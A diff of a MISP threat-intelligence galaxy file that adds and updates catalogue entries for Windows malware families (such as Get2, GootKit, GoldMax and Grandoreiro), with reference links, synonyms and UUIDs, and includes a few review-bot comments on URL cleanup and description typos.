+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "06d80b50-703a-4cf9-989e-b8b1bf71144a",
+ "value": "GEARSHIFT"
+ },
 {
 "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.",
 "meta": {
@@ -8606,6 +16202,42 @@ "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", "value": "GEMCUTTER" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.get2", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md", + "https://github.com/Tera0017/TAFOF-Unpacker", + "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/", + "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/", + "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/", + "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://www.goggleheadedhacker.com/blog/post/13", + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + 
"https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" + ], + "synonyms": [ + "FRIENDSPEAK", + "GetandGo" + ], + "type": [] + }, + "uuid": "f6aa0163-bde3-44a2-8acc-3e7a04cf167d", + "value": "Get2" + }, { "description": "", "meta": { @@ -8637,6 +16269,19 @@ "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", "value": "GetMyPass" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd", + "https://ihonker.org/thread-1504-1-1.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a762023d-8d46-43a8-be01-3b2362963de0", + "value": "get_pwd" + }, { "description": "", "meta": { 
@@ -8692,17 +16337,45 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack", + "https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/", "http://www.hexblog.com/?p=1248", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.intezer.com/blog-chinaz-relations/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html", + "http://www.nartv.org/mirror/ghostnet.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-fleetwood", "https://blog.cylance.com/the-ghost-dragon", - "https://www.intezer.com/blog-chinaz-relations/" + "https://s.tencent.com/research/report/836.html", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/", + 
"https://blog.talosintelligence.com/2019/09/panda-evolution.html", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-globe", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.datanet.co.kr/news/articleView.html?idxno=133346", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "https://www.secureworks.com/research/threat-profiles/bronze-edison", + "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://risky.biz/whatiswinnti/", + "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html", + "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf", + "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/" ], "synonyms": [ + "Farfli", "Gh0st RAT", "PCRat" ], 
@@ -8715,8 +16388,46 @@
 "description": "",
 "meta": {
 "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses",
- "https://forum.exploit.in/pda/index.php/t102378.html"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish",
+ "https://id-ransomware.blogspot.com/2020/02/gibberish-ransomware.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f561656c-19d1-4b07-a193-3293d053e774",
+ "value": "Gibberish Ransomware"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy",
+ "https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d",
+ "value": "Giffy"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui",
+ "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7f768705-d852-4c66-a7e0-76fd5016d07f",
+ "value": "Ginwui"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses"
 ],
 "synonyms": [
 "Wordpress Bruteforcer"
@@ -8758,9 +16469,16 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter",
 "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
+ "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
 "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
 "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
 "https://isc.sans.edu/diary/23417",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "https://blog.ensilo.com/globeimposter-ransomware-technical",
 "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet"
 ],
@@ -8800,10 +16518,16 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba",
+ "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728",
+ "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
 "http://resources.infosecinstitute.com/tdss4-part-1/",
- "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/",
- "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
+ "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
+ "https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html",
 "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
+ "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
 "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
 ],
 "synonyms": [],
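Review bot: The Glupteba ref `https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728` carries a marketing campaign parameter that is not part of the resource identity; stored as-is it will collide with the same article whenever it is added again without the parameter, producing the kind of near-duplicate seen elsewhere in this commit. The same `?cmp=30728` suffix is on the Gootloader ref added in the gootkit hunk further down; stripping the query string from both gives canonical URLs. The Glupteba entry's `type`, `uuid` and `value` lines lie past the end of the hunk.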
@@ -8812,12 +16536,71 @@ "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", "value": "Glupteba" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr", + "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "56060ca3-ee34-4df9-bcaa-70267d8440c1", + "value": "GoBotKR" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker", + "https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html", + "https://twitter.com/GrujaRS/status/1254657823478353920", + "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f93da83e-0c2f-4dc0-82c6-2fcc6339dcf2", + "value": "goCryptoLocker" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12", + "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/" + ], + "synonyms": [ + "GOSLU" + ], + "type": [] + }, + "uuid": "f62ad36f-e274-4fdb-b71d-887f9cd9c215", + "value": "Godlike12" + }, + { + "description": "Proof of concept for data exfiltration via DoH, written in Go.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh", + "https://sensepost.com/blog/2018/waiting-for-godoh/", + "https://github.com/sensepost/goDoH" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b54b4238-550f-42a7-9e62-d1ad5e4d3904", + "value": "goDoH" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + 
"https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/"
 ],
 "synonyms": [],
 "type": []
@@ -8838,14 +16621,28 @@
 "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2",
 "value": "Goggles"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle",
+ "https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/"
+ ],
+ "synonyms": [
+ "BossiTossi"
+ ],
+ "type": []
+ },
+ "uuid": "034a3db0-b53c-4ec1-9390-4b6f214e1233",
+ "value": "GoGoogle"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye",
 "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
- "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html"
+ "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/"
 ],
 "synonyms": [
 "Petya/Mischa"
@@ -8857,10 +16654,60 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1dd854b4-d8e6-438c-a0b1-6991b8b6ff92", + "value": "GoldenHelper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy", + "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", + "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/", + "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf", + "https://www.ic3.gov/media/news/2020/200728.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/", + "https://www.ic3.gov/Media/News/2020/201103-1.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "86b8bd8d-19c5-4c7a-befd-0eb6297776bc", + "value": "GoldenSpy" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax", + "https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/", + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + ], + "synonyms": [ + "SUNSHUTTLE" + ], + "type": [] + }, + "uuid": 
"9a3429d7-e4a8-43c5-8786-0b3a1c841a5f", + "value": "GoldMax" + }, + { + "description": "GoldDragon was a second-stage backdoor which established a permanent presence on the victim\u2019s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.\r\n\r\nThe malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" ], "synonyms": [], "type": [] @@ -8881,11 +16728,26 @@ "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", "value": "Golroted" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer", + "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ea9a9585-2a99-42b9-a724-bf7af82bb986", + "value": "Gomorrah stealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/", "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" ], "synonyms": [ 
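Review bot: The GoldDragon description added in this hunk misspells `campaing` (should be `campaign`) and ends with a trailing space inside the string, `...from its C&C server. "`, both of which MISP will display verbatim; the fix is `a Korean-language spear phishing campaign targeted organizations` and `from its C&C server."`. The same hunk removes `https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/`, which appears to be the primary reporting the new description summarises, and leaves only a Cybereason Kimsuky article; if the McAfee URL merely moved, the current location or an archive link is worth keeping in `refs` so the description remains traceable to a source. Because every entry's first ref points at malpedia.caad.fkie.fraunhofer.de, these corrections presumably need to land in the upstream export as well. The Gold Dragon entry's `uuid` and `value` lines lie past the end of the hunk.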
@@ -8927,24 +16789,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", - "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://dannyquist.github.io/gootkit-reversing-ghidra/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", + "https://www.certego.net/en/news/malware-tales-gootkit/", + "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728", "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", + "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html", + "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html", + "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", 
"https://www.youtube.com/watch?v=242Tn0IL2jE", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/", + "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/" + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://twitter.com/MsftSecIntel/status/1366542130731094021", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" ], "synonyms": [ + "Waldek", "Xswkit", "talalpek" ], 
@@ -8953,6 +16828,20 @@ "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe", + "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques", + "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce", + "value": "Gophe" + }, { "description": "", "meta": { @@ -8971,10 +16860,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", + "https://github.com/mlodic/ursnif_beacon_decryptor", + "https://lokalhost.pl/gozi_tree.txt", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ @@ -8997,7 +16891,6 @@ "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], 
@@ -9033,16 +16926,52 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "According to ESET Research, Grandoreirois a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. 
As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", + "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c62219e2-74a3-49c2-a33d-0789b820c467", + "value": "Grandoreiro" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal", + "http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14", + "value": "GrandSteal" + }, + { + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" ], "synonyms": [ "FrameworkPOS", + "SCRAPMINT", "trinity" ], "type": [] @@ -9054,8 +16983,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem" ], "synonyms": [], "type": [] 
@@ -9068,6 +16996,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://securelist.com/gravityrat-the-spy-returns/99097/", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], @@ -9110,10 +17040,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", - "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", - "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.eset.com/int/greyenergy-exposed/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", "https://github.com/NozomiNetworks/greyenergy-unpacker" ], "synonyms": [], 
